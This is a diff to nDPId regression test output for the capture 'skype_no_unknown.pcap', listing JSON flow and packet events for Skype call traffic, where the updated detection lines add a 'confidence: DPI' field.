 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5i9YAAEARDTHAqAEinTeCqzLdnEwAJdiNeuEC3c6rdtKsOez6ZXpeJVa7dJ779QK3\/h1JCUU="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4dm4AAEARIgTAqAEiQTffQTLdgQkAJKmFeuMCyKqN77xeuXZwH4mCRZ2EnuTirQv1Yiuj0A=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4qTUAAEARhmHAqAEi1cezjDLdnEMAJE+IeuUC57gN1FWjl+cH4OXx7LBzSKM5WN7Ui1CRpw=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAx6cAAEARH9zAqAEinTg0JzLdnF8ALF\/teucC9OsZNQfegPGKe6bjID0chTfhFg98J57+zrR\/SJSxjuh7"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431970649778,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970649778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+a34AAEARfBXAqAEinTg0GTLdnEoAKvPOeukCU4Ora98LBiEx3upKt3C\/idNCTbgKHnJdEXlx5pIWdA=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="}
@@ -256,19 +256,19 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ax0AAEARLXbAqAEiQTffHDLdnE4AKA\/ueusCO4\/2IMsd1vZVtYtrG4KJHI0MKaf\/zYcpuYfyCTg="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA02DgAAEARwOTAqAEinTeCmjLdnE0AIDT4eu0C9+f6EdNHv7hYXHZqXAueiqwkwiBF"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+20MAAEARvT3AqAEiQTffLDLdnFQAKsWAeu8CRodfDjWwQgXB9ThlvK8WB1Z6kJ0K1lKVKQH1\/lgrJA=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA++5AAAEARZaPAqAEiQAQXrTLdnFEAKkiDevECuUkWpyPJriCjpMdyVTxdl5EcBPkRY6\/lJZGF7hytnA=="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/bcAAEARMcnAqAEi1cezmjLdnFEALEFuevMCLFThLGMqgdMtKoErvKHNoLTdO9PKUomxAAk6+9gobSzp"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="}
